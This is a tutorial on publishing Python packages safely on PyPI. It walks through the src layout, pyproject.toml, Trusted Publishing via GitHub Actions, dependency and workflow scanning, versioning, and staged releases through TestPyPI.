Publishing Python packages in 2025 means dealing with an ecosystem under constant attack. PyPI faces a steady stream of malicious packages - thousands uploaded monthly - from typosquatting to supply chain attacks. The December 2024 Ultralytics breach where hackers injected Bitcoin mining malware into a popular computer vision package wasn't an anomaly - it's the new normal.
Modern Package Structure: src/ Layout Saves Lives
Forget everything you learned about Python package structure from tutorials written in 2019. The modern approach uses src layout - not because it's trendy, but because it prevents you from accidentally testing your local code instead of the installed package.
myproject/
├── src/
│ └── mypackage/
│ ├── __init__.py
│ └── core.py
├── tests/
├── pyproject.toml
└── README.md
Why this matters: When you run tests, Python can't import from your local working directory. It forces you to install and test the actual package, catching import errors before users do. I've seen packages with 50k+ downloads that don't work because the maintainer never tested the installed version.
pyproject.toml: The Only Config File You Need
setup.py
is legacy garbage. Modern Python packaging uses pyproject.toml
exclusively:
[build-system]
requires = ["setuptools>=61.0", "wheel"]
build-backend = "setuptools.build_meta"
[project]
name = "mypackage"
version = "0.1.0"
description = "Does stuff without breaking"
authors = [{name = "Your Name", email = "you@domain.com"}]
license = {text = "MIT"}
dependencies = [
"requests>=2.31.0,<3.0.0", # Pin major versions
"click>=8.0.0"
]
requires-python = ">=3.8"
classifiers = [
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
]
[project.urls]
Homepage = "https://github.com/yourusername/mypackage"
Repository = "https://github.com/yourusername/mypackage.git"
Issues = "https://github.com/yourusername/mypackage/issues"
[tool.setuptools.packages.find]
where = ["src"]
Trusted Publishing: No More Token Leakage
Traditional PyPI publishing requires storing API tokens as GitHub secrets. These get compromised regularly through various attack vectors. Trusted Publishing eliminates tokens entirely by letting PyPI authenticate GitHub Actions directly.
Setup takes 5 minutes:
PyPI side: Account Settings → Publishing → Add a new pending publisher
- Repository:
yourusername/yourpackage
- Workflow filename:
publish.yml
- Environment name:
pypi
(creates access control)
- Repository:
GitHub side: Create a protected environment named
pypi
in your repo settings- Settings → Environments → New environment
- Add "Required reviewers" - only these people can trigger releases
- This prevents random contributors from publishing malicious updates
Workflow: Use the official PyPA action:
name: Publish to PyPI
on:
release:
types: [published] # Only on tagged releases
jobs:
publish:
runs-on: ubuntu-latest
environment: pypi # References the protected environment
permissions:
id-token: write # Required for trusted publishing
steps:
- uses: actions/checkout@v4
- uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Build package
run: |
pip install build
python -m build
- uses: pypa/gh-action-pypi-publish@release/v1
# No token needed - authenticates via OIDC
Security Scanning: Catch Problems Before Users Do
Dependency vulnerabilities are the most common attack vector. pip-audit scans your dependencies against the PyPA Advisory Database:
pip install pip-audit
pip-audit # Scans current environment
pip-audit --desc # Shows vulnerability descriptions
pip-audit --fix # Attempts to upgrade to safe versions
Workflow vulnerabilities get scanned by zizmor, which catches template injection attacks like the one that compromised Ultralytics:
pip install zizmor
zizmor .github/workflows/ # Scans all workflows
Add both to your CI pipeline:
- name: Audit dependencies
run: pip-audit --desc --format=json
- name: Audit workflows
run: zizmor --format=json .github/workflows/
Version Management: Semantic Versioning That Doesn't Suck
Your version numbers communicate compatibility to automated tools. Use Semantic Versioning:
1.0.0
→1.0.1
: Bug fixes (safe to auto-update)1.0.0
→1.1.0
: New features (probably safe)1.0.0
→2.0.0
: Breaking changes (requires human review)
Automate versioning with bump2version:
pip install bump2version
bump2version patch # 1.0.0 → 1.0.1
bump2version minor # 1.0.1 → 1.1.0
bump2version major # 1.1.0 → 2.0.0
Testing Your Package: The Reality Check
Test the installed package, not your local code:
## Build and install in isolated environment
python -m build
pip install dist/*.whl --force-reinstall
## Test the installed version
python -c \"import mypackage; print(mypackage.__version__)\"
python -m pytest tests/ # Tests should still pass
Common gotchas that only show up in the installed version:
- Missing
__init__.py
files - Incorrect package paths in
pyproject.toml
- Missing data files not included in MANIFEST.in
- Import errors due to incorrect module structure
Release Process: The Human Firewall
Automated publishing is convenient but dangerous. Implement human oversight:
- Code review: All changes require PR approval
- Protected environments: Only trusted maintainers can publish
- Release checklist: Document the manual steps
- Staging repository: Test on TestPyPI first
TestPyPI workflow:
## Upload to TestPyPI first
twine upload --repository testpypi dist/*
## Test install from TestPyPI
pip install --index-url https://test.pypi.org/simple/ mypackage
## If it works, upload to real PyPI
twine upload dist/*
This caught a bug in my last release where the package imported fine locally but failed on fresh installs due to a missing dependency declaration.
Pro tip: Always test your wheel installation on a completely fresh Python environment. I've seen packages that work with pip install -e .
but fail when installed normally because they're importing from the local development directory.